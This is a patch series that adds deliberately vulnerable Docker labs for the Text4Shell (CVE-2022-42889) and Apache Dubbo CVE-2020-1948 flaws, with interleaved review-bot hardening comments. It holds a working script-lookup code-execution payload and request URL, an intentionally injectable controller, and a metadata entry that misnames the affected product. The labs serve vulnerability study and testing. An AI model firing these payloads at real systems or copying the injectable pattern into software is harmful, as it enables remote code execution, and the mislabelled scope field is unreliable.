From 36b608033f3978f222e51fe009712b2d1bfd77e0 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Thu, 23 Mar 2023 13:23:03 +0000 Subject: [PATCH 1/8] add cve-2022-42889 Signed-off-by: GQ246 --- cve/docker/2022/cve-2022-42889/Dockerfile | 18 ++++++ cve/docker/2022/cve-2022-42889/README.md | 61 +++++++++++++++++++ cve/docker/2022/cve-2022-42889/pom.xml | 46 ++++++++++++++ .../com/levo/dockerexample/DockerApp.java | 11 ++++ .../controller/HelloController.java | 30 +++++++++ .../dockerexample/PlaceHolderForTest.java | 5 ++ 6 files changed, 171 insertions(+) create mode 100644 cve/docker/2022/cve-2022-42889/Dockerfile create mode 100644 cve/docker/2022/cve-2022-42889/README.md create mode 100644 cve/docker/2022/cve-2022-42889/pom.xml create mode 100644 cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java create mode 100644 cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java create mode 100644 cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java diff --git a/cve/docker/2022/cve-2022-42889/Dockerfile b/cve/docker/2022/cve-2022-42889/Dockerfile new file mode 100644 index 00000000..a31999b9 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/Dockerfile @@ -0,0 +1,18 @@ +# Use an official OpenJDK runtime as a parent image +FROM openjdk:8-jre-alpine + +# set shell to bash +# source: https://stackoverflow.com/a/40944512/3128926 +RUN apk update && apk add bash + +# Set the working directory to /app +WORKDIR /app + +# Copy the fat jar into the container at /app +COPY /target/text4shell-poc.jar /app + +# Make port 8080 available to the world outside this container +EXPOSE 8080 + +# Run jar file when the container launches +CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/README.md b/cve/docker/2022/cve-2022-42889/README.md new file mode 100644 index 00000000..2452d91e --- /dev/null 
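Review bot: The PoC runs as root — there is no `USER` directive between `WORKDIR /app` and `CMD`, so a successful `${script:javascript:...}` payload executes as uid 0 inside the container, and the README pairs this with `docker run -p 80:8080`, which publishes that endpoint on every host interface. Add an unprivileged user, e.g. `RUN adduser -D -h /app app && chown -R app:app /app` followed by `USER app`, and recommend `-p 127.0.0.1:80:8080` in the README so the lab is only reachable from the host. The `RUN apk update && apk add bash` layer is not used by the exec-form `CMD ["java", "-jar", ...]`; drop it, or at least use `apk add --no-cache bash` so the package index is not baked into the image. `openjdk:8-jre-alpine` is a floating tag; pin it by digest so the image contents stay reproducible.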
+++ b/cve/docker/2022/cve-2022-42889/README.md @@ -0,0 +1,61 @@ +### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) +------------- + + +1. Maven install to create the fat jar + +``` +mvn clean install +``` + +2. Docker build + +``` +docker build --tag=text4shell . +``` + +3. Docker run + +``` +docker run -p 80:8080 text4shell +``` + +4. Test the app + +``` +http://localhost/text4shell/attack?search= +``` + +5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: + +``` +${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} +``` + +http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D + +6. You can also try using `dns` or `url` prefixes. + +7. Get the container id + +``` +docker container ls +``` + +8. Get into the app + +``` +docker exec -it bash +``` + +9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): + +``` +ls /tmp/ +``` + +10. To stop the container + +``` +docker container stop +``` \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/pom.xml b/cve/docker/2022/cve-2022-42889/pom.xml new file mode 100644 index 00000000..80084258 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/pom.xml @@ -0,0 +1,46 @@ + + 4.0.0 + com.levo.dockerexample + docker-java-app-example + jar + 1.0-SNAPSHOT + docker-java-app-example + http://maven.apache.org + + + UTF-8 + UTF-8 + 1.8 + com.levo.dockerexample.DockerApp + + + + org.springframework.boot + spring-boot-starter-parent + 2.1.1.RELEASE + + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.commons + commons-text + 1.8 + + + + + text4shell-poc + + + org.springframework.boot + spring-boot-maven-plugin + + + + + 
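Review bot: The `org.apache.commons:commons-text` dependency pinned at `1.8` is the vulnerable component the lab exists for, but nothing in the pom says so, and a dependency-update bot or a well-meaning reader will bump it to 1.10.0 and silently break the lab. Add an XML comment directly above the dependency: `<!-- CVE-2022-42889: commons-text 1.5-1.9 enables script:/dns:/url: lookups by default; intentionally pinned, do not upgrade (fixed in 1.10.0) -->`. A similar note on `spring-boot-starter-parent 2.1.1.RELEASE` saying it is out of support but not the subject of this lab would avoid confusion. The XML markup has been stripped in this rendering, so element nesting could not be checked.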
diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java new file mode 100644 index 00000000..d1d037bf --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java @@ -0,0 +1,11 @@ +package com.levo.dockerexample; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class DockerApp { + public static void main(String[] args) { + SpringApplication.run(DockerApp.class, args); + } +} diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java new file mode 100644 index 00000000..b4fa1922 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java 
@@ -0,0 +1,30 @@ +package com.levo.dockerexample.controller; + +import java.util.Date; + +import org.apache.commons.text.StringSubstitutor; + +import org.springframework.web.bind.annotation.ResponseBody; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestMethod; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.bind.annotation.RestController; + +@RestController +@RequestMapping("text4shell") +public class HelloController { + + @RequestMapping(value = "/attack", method = RequestMethod.GET) + @ResponseBody + public String attack(@RequestParam(defaultValue="5up3r541y4n") String search) { + StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); + // String pocstring = "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}"; + try{ + String pwn = interpolator.replace(search); + } catch(Exception e) { + System.out.println(e); + } + return "Search results for: " + search; + } + +} diff --git a/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java new file mode 100644 index 00000000..300beb32 --- /dev/null +++ b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java @@ -0,0 +1,5 @@ +package com.levo.dockerexample; + +public class PlaceHolderForTest { + +} -- Gitee From 81b16e7e935e53cee8e686c324b63bd8689d1ece Mon Sep 17 00:00:00 2001 From: GQ246 Date: Thu, 23 Mar 2023 13:29:06 +0000 Subject: [PATCH 2/8] add cve/docker/2022/yaml/cve-2022-42889.yaml. Signed-off-by: GQ246 --- cve/docker/2022/yaml/cve-2022-42889.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/docker/2022/yaml/cve-2022-42889.yaml 
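Review bot: The interpolation sink `String pwn = interpolator.replace(search);` is the whole point of the controller, yet it carries no comment and its result is discarded, so a reader needs prior knowledge of the CVE to understand why the line exists. Mark it explicitly: `// VULNERABLE (CVE-2022-42889): createInterpolator() in commons-text 1.5-1.9 enables script:, dns: and url: lookups by default; request input must never reach StringSubstitutor here`. The `catch (Exception e) { System.out.println(e); }` discards the stack trace; an SLF4J logger with the exception as the last argument would keep the lab debuggable without changing behavior. `import java.util.Date` is unused and `@ResponseBody` is redundant on a `@RestController`, and echoing `search` unescaped in the response is a reflected-XSS candidate if a browser negotiates an HTML content type — acceptable for a lab, but worth a comment.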
diff --git a/cve/docker/2022/yaml/cve-2022-42889.yaml b/cve/docker/2022/yaml/cve-2022-42889.yaml new file mode 100644 index 00000000..5672cca7 --- /dev/null +++ b/cve/docker/2022/yaml/cve-2022-42889.yaml @@ -0,0 +1,20 @@ +id: cve-2022-42889 +source: + https://github.com/karthikuj/cve-2022-42889-text4shell-docker +info: + name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 + severity: CRITICAL + description: | + Apache Commons Text执行变量插值,允许动态评估和扩展属性。插值的标准格式是“${prefix:name}”,其中“前缀”用于定位执行插值的org.apache.commons.text.lookup.StringLookup的实例。从版本 1.5 开始一直到 1.9,默认查找实例集包括可能导致任意代码执行或与远程服务器联系的插值器。这些查找是: - “脚本” - 使用 JVM 脚本执行引擎 (javax.script) 执行表达式 - “DNS” - 解析 DNS 记录 - “网址” - 从 URL 加载值,包括从远程服务器加载值 如果使用不受信任的配置值,则在受影响版本中使用插值默认值的应用程序可能容易受到远程代码执行或与远程服务器的意外联系。建议用户升级到Apache Commons Text 1.10.0,默认情况下禁用有问题的插值器。 + scope-of-influence: + Docker 1.5-1.10.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: cve-2022-42889 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: Docker,cve2022 \ No newline at end of file -- Gitee From 6f84130e9e9c9a755166bebc2f240590dc06ca19 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Fri, 7 Apr 2023 15:54:12 +0000 Subject: [PATCH 3/8] add CVE-2020-1948 
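Review bot: `scope-of-influence: Docker 1.5-1.10.0` names the wrong product and the wrong range — the vulnerable component is Apache Commons Text, versions 1.5 through 1.9, and 1.10.0 is the fixed release according to the description's own last sentence. Change it to `Apache Commons Text 1.5-1.9`. `info.name` likewise describes Docker rather than Commons Text, and `tags: Docker,cve2022` will mis-file the entry; Docker is only the delivery vehicle for the lab, so the name and tags should reference Apache Commons Text.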
Signed-off-by: GQ246 --- .../2020/CVE-2020-1948/Dockerfile | 19 + cve/apache-Dubbo/2020/CVE-2020-1948/README.md | 73 +++ .../2020/CVE-2020-1948/docker-compose.yml | 9 + .../src/dubbo-spring-boot-parent/pom.xml | 459 ++++++++++++++++++ .../auto-configure-samples/pom.xml | 38 ++ .../provider-sample/pom.xml | 89 ++++ ...bboAutoConfigurationProviderBootstrap.java | 38 ++ .../provider/service/DefaultDemoService.java | 62 +++ .../src/main/resources/application.properties | 12 + .../src/dubbo-spring-boot-samples/pom.xml | 96 ++++ .../sample-api/pom.xml | 33 ++ .../boot/sample/consumer/DemoService.java | 28 ++ .../2020/CVE-2020-1948/src/pom.xml | 197 ++++++++ 13 files changed, 1153 insertions(+) create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/README.md create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml create mode 100644 
cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java create mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile b/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile new file mode 100644 index 00000000..59c3351c --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile @@ -0,0 +1,19 @@ +FROM maven:3.5-jdk-8 AS pre_jar + +COPY src/ /src/ + +WORKDIR /src/ + +RUN mvn package -DskipTests=true + +FROM szgx/java:8u111_debian + +LABEL maintainer="mO0n@guanxin" version="1.0" + +COPY --from=pre_jar --chown=0:0 /src/target/dubbo.jar /dubbo.jar + +WORKDIR / + +ENTRYPOINT ["bash", "-c", "java -jar /dubbo.jar"] + +EXPOSE 12345 \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/README.md b/cve/apache-Dubbo/2020/CVE-2020-1948/README.md new file mode 100644 index 00000000..f7e4fd14 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/README.md 
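Review bot: The runtime stage pulls `szgx/java:8u111_debian`, a non-official image from a personal namespace with no digest pin, so what ends up in the lab depends on whoever controls that repository — a supply-chain weakness even for a deliberately vulnerable environment. Use the same official family as the build stage, e.g. an official `openjdk:8-jre` tag pinned with `@sha256:...`, or at minimum pin this image by digest. `ENTRYPOINT ["bash", "-c", "java -jar /dubbo.jar"]` wraps the JVM in a shell for no visible reason, so `java` is not PID 1 and stop signals go to bash; use `ENTRYPOINT ["java", "-jar", "/dubbo.jar"]`. Nothing sets a non-root `USER`, so the deserialization RCE lands as root inside the container.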
@@ -0,0 +1,73 @@ +# Apache Dubbo CVE-2020-1948 测试环境 + +## 引子 + +在这个漏洞出现之初,为了验证该漏洞的危害,我们从互联网上搜寻了很多人整理的例子,发现没有一个能够顺利验证该漏洞,故自己搞了一个,放在这里供大家参考,欢迎交流! + +本环境基于 Apache Dubbo 官方示例环境改造而来,纠正了官方示例程序中几处编译中报错问题。例如: + +- 官方示例代码中应用的 DubboService 类,实际应该 Service。 + +## 编译 + +``` +cd src +mvn package +``` + +编译成功后会在 `src/target` 目录生成 `dubbo.jar` 文件。 + +## 运行 + +``` +java -jar target/dubbo.jar +``` + +运行成功后,监听 12345 端口,可以使用 `telnet` 命令连接测试。 + +``` +telnet x.x.x.x 12345 +# dubbo> ls -l +# PROVIDER: +# org.apache.dubbo.spring.boot.sample.consumer.DemoService:1.0.0 -> published: N +``` + +## 容器化 + +``` +# 构建 +docker build -t dsolab/dubbo:cve-2020-1948 . + +# 运行 +docker run -p 12345:12345 dsolab/dubbo:cve-2020-1948 -d +或 +docker-compose up -d + +# 访问 +telnet x.x.x.x 12345 +``` + +只想快速使用环境(懒得编译环境)的小朋友可以用下面的命令启动我们提供的镜像环境: + +``` +# 需要安装 Docker 和 docker-compose +docker-compose up -d +``` + +## 漏洞验证 + +参见 [Apache Dubbo CVE-2020-1948 反序列化漏洞验证方法](https://github.com/DSO-Lab/Dubbo-CVE-2020-1948/wiki) + +## 参考链接 + +- Dubbo Spring Boot Project + +https://github.com/apache/dubbo-spring-boot-project/ + +- Dubbo Pull Request + +https://github.com/apache/dubbo/pull/6374 + +- Dubbo Mail Archive + +https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml b/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml new file mode 100644 index 00000000..b0ff1ed7 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml @@ -0,0 +1,9 @@ +version: "3" + +services: + api: + build: . + image: dsolab/dubbo:cve-2020-1948 + container_name: cve-2020-1948 + ports: + - "12345:12345" \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml new file mode 100644 index 00000000..836b4700 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml 
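Review bot: `ports: - "12345:12345"` publishes the Dubbo port on every host interface, so anyone who can reach the host can trigger the deserialization RCE this lab reproduces. Bind to loopback unless remote access is intended: `- "127.0.0.1:12345:12345"`. A one-line comment above `ports` stating that the service is intentionally vulnerable and must not be exposed beyond the host would help anyone reusing the compose file.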
@@ -0,0 +1,459 @@ + + + + + org.apache.dubbo + dubbo-spring-boot-project + ${revision} + ../pom.xml + + + 4.0.0 + + dubbo-spring-boot-parent + pom + Apache Dubbo Spring Boot :: Parent + Apache Dubbo Spring Boot Parent + + + 1.8 + 1.8 + 1.8 + UTF-8 + UTF-8 + 2.3.0.RELEASE + ${revision} + + -server -Xms256m -Xmx512m -Dfile.encoding=UTF-8 -Djava.net.preferIPv4Stack=true + + + + + 3.0.2 + 3.6.0 + 3.0.1 + 0.8.2 + 1.5 + 0.12 + 2.5.3 + 2.19.1 + + + + + + + org.springframework.boot + spring-boot-dependencies + ${spring-boot.version} + pom + import + + + + + org.apache.dubbo + dubbo-dependencies-bom + ${dubbo.version} + pom + import + + + + org.apache.dubbo + dubbo + ${dubbo.version} + + + org.springframework + spring + + + javax.servlet + servlet-api + + + log4j + log4j + + + + + + + + + + + central + https://repo.maven.apache.org/maven2 + + false + + + + + apache.snapshots.https + Apache Development Snapshot Repository + https://repository.apache.org/content/repositories/snapshots + + false + + + true + + + + + spring-milestone + Spring Milestone + https://repo.spring.io/milestone + + false + + + + spring-snapshot + Spring Snapshot + https://repo.spring.io/snapshot + + true + + + + rabbit-milestone + Rabbit Milestone + https://dl.bintray.com/rabbitmq/maven-milestones + + false + + + + + + + central + https://repo.maven.apache.org/maven2 + + false + + + + spring-milestone + Spring Milestone + https://repo.spring.io/milestone + + false + + + + spring-snapshot + Spring Snapshot + https://repo.spring.io/snapshot + + true + + + + + + + + + src/main/resources/ + false + + + ../ + META-INF/ + false + + NOTICE + LICENSE + + + + + + org.apache.maven.plugins + maven-jar-plugin + ${maven-jar-plugin.version} + + + true + true + + true + true + + + ${project.version} + ${project.version} + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + ${maven-compiler-plugin.version} + + true + ${java.source.version} + ${java.target.version} + ${project.build.sourceEncoding} + + + + + 
org.jacoco + jacoco-maven-plugin + ${maven-jacoco-plugin.version} + + + jacoco-initialize + + prepare-agent + + + jacocoArgLine + + + + jacoco-site + package + + report + + + + + + + org.apache.maven.plugins + maven-enforcer-plugin + + + enforce-rules + + enforce + + + + + [1.8,) + + + project.name + + + project.description + + + true + + + + + + org.apache.maven.plugins + maven-source-plugin + ${maven-source-plugin.version} + + + attach-sources + + jar-no-fork + + + + + + org.apache.maven.plugins + maven-surefire-plugin + ${maven-surefire-plugin.version} + + true + once + ${argline} ${jacocoArgLine} + + + + transporter + ${transporter} + + + serialization + ${serialization} + + + + port + ${port} + + + threadpool + ${threadpool} + + + threads + ${threads} + + + iothreads + ${iothreads} + + + + server + ${server} + + + timeout + ${timeout} + + + length + ${length} + + + connections + ${connections} + + + base + ${base} + + + concurrent + ${concurrent} + + + runs + ${runs} + + + onerror + ${onerror} + + + + + + org.apache.rat + apache-rat-plugin + ${apache-rat-plugin.version} + + + verify.rat + verify + + check + + + + **/*.versionsBackup + **/.idea/ + **/*.iml + **/*.txt + **/*.load + **/*.flex + **/*.fc + **/*.javascript + **/*.properties + **/*.yml + **/*.yaml + **/*.thrift + **/*.sh + **/*.bat + **/*.md + .git/ + .gitignore + + .repository/ + **/.settings/* + **/.classpath + **/.project + **/target/** + **/*.log + CODE_OF_CONDUCT.md + .codecov.yml + .travis.yml + PULL_REQUEST_TEMPLATE.md + CONTRIBUTING.md + README.md + README_CN.md + **/codestyle/* + **/resources/META-INF/** + **/*.factories + **/*.provides + **/*.properties + **/*.json + + + + + + + + org.apache.maven.plugins + maven-release-plugin + ${maven-release-plugin.version} + + true + false + release + deploy + ${arguments} + + + + + + + + + + spring-boot-2.0 + + 2.0.9.RELEASE + + + + + + spring-boot-2.1 + + 2.1.13.RELEASE + + + + + + spring-boot-2.2 + + 2.2.7.RELEASE + + + + + 
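Review bot: The repository lists enable snapshot resolution — `spring-snapshot` (`https://repo.spring.io/snapshot`) has snapshots enabled in both `repositories` and `pluginRepositories`, and `apache.snapshots.https` is present — so the build can pull mutable, unsigned artifacts and is not reproducible, which matters for a lab that must pin one specific vulnerable Dubbo. `rabbit-milestone` points at `dl.bintray.com`, which to my knowledge is retired, so it can only slow down or fail the Maven stage. Keep `central` (plus `spring-milestone` if a dependency really needs it) and drop the snapshot and bintray entries. Markup is stripped in this rendering, so the exact element nesting could not be verified.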
diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml new file mode 100644 index 00000000..a4310f16 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml @@ -0,0 +1,38 @@ + + + + + org.apache.dubbo.samples + dubbo-spring-boot-samples + ${revision} + ../pom.xml + + 4.0.0 + + dubbo-spring-boot-auto-configure-samples + Apache Dubbo Spring Boot :: Samples :: Auto-Configure + Apache Dubbo Spring Boot Auto-Configure Samples + pom + + + provider-sample + + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml new file mode 100644 index 00000000..6150f021 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml @@ -0,0 +1,89 @@ + + + + + org.apache.dubbo.samples + dubbo-spring-boot-auto-configure-samples + ${revision} + ../pom.xml + + 4.0.0 + + dubbo-spring-boot-auto-configure-provider-sample + Apache Dubbo Spring Boot :: Samples :: Auto-Configure :: Provider Sample + + + + + + org.springframework.boot + spring-boot-starter + + + + org.apache.dubbo + dubbo-spring-boot-starter + ${revision} + + + + org.apache.dubbo + dubbo-remoting-api + ${revision} + + + + org.apache.dubbo.samples + dubbo-spring-boot-sample-api + ${revision} + + + + com.rometools + rome + 1.7.0 + + + + + + + + org.springframework.boot + spring-boot-maven-plugin + ${spring-boot.version} + + + + repackage + + + + + false + dubbo + ${user.dir}/target + + + + + + + \ No newline at end of file 
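Review bot: `com.rometools:rome:1.7.0` is the only dependency in the provider sample that is neither a Dubbo nor a Spring artifact, and nothing explains its presence; it is presumably there to supply the deserialization gadget classes the CVE-2020-1948 PoC needs, which is exactly what a future maintainer must know before removing it as "unused". Add an XML comment above it, e.g. `<!-- gadget-chain library for the CVE-2020-1948 PoC; intentionally present, not referenced by the sample code -->`, adjusting the wording if it serves another purpose. `dubbo-remoting-api` at `${revision}` is likewise undocumented relative to the upstream sample.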
diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java new file mode 100644 index 00000000..0c2c2392 --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java 
@@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.dubbo.spring.boot.sample.provider.bootstrap; + +import org.apache.dubbo.spring.boot.sample.provider.service.DefaultDemoService; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.EnableAutoConfiguration; + +/** + * Dubbo Auto-Configuration Provider Bootstrap + * + * @see DefaultDemoService + * @since 2.7.0 + */ +@EnableAutoConfiguration +public class DubboAutoConfigurationProviderBootstrap { + + public static void main(String[] args) { +// new SpringApplicationBuilder(DubboAutoConfigurationProviderBootstrap.class) +// .run(args); + SpringApplication.run(DubboAutoConfigurationProviderBootstrap.class,args); + } +} diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java new file mode 100644 index 00000000..91c8ea5d --- /dev/null 
+++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java 
@@ -0,0 +1,62 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.dubbo.spring.boot.sample.provider.service; + +import org.apache.dubbo.config.annotation.Service; +import org.apache.dubbo.spring.boot.sample.consumer.DemoService; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.beans.factory.annotation.Value; + +import java.util.Random; + +/** + * Default {@link DemoService} + * + * @see DemoService + * @since 2.7.0 + */ +@Service(version = "1.0.0") +public class DefaultDemoService implements DemoService { + + private final Logger logger = LoggerFactory.getLogger(getClass()); + + private final Random costTimeRandom = new Random(); + + /** + * The default value of ${dubbo.application.name} is ${spring.application.name} + */ + @Value("${dubbo.application.name}") + private String serviceName; + + @Override + public String sayHello(String name) { + await(); + return String.format("[%s] : Hello, %s", serviceName, name); + } + + private void await() { + try { + long timeInMillisToWait = costTimeRandom.nextInt(500); + Thread.sleep(timeInMillisToWait); + logger.info("execution time : " + timeInMillisToWait + " ms."); + } catch (InterruptedException e) { + throw new 
RuntimeException(e); + } + } +} \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties new file mode 100644 index 00000000..db9e2dbf --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties @@ -0,0 +1,12 @@ +# Spring boot application +spring.application.name=dubbo-auto-configuration-provider-demo +# Base packages to scan Dubbo Component: @org.apache.dubbo.config.annotation.Service +dubbo.scan.base-packages=org.apache.dubbo.spring.boot.sample.provider.service +# Dubbo Application +## The default value of dubbo.application.name is ${spring.application.name} +## dubbo.application.name=${spring.application.name} +# Dubbo Protocol +dubbo.protocol.name=dubbo +dubbo.protocol.port=12345 +## Dubbo Registry +dubbo.registry.address=N/A \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml new file mode 100644 index 00000000..72f28dee --- /dev/null +++ b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml 
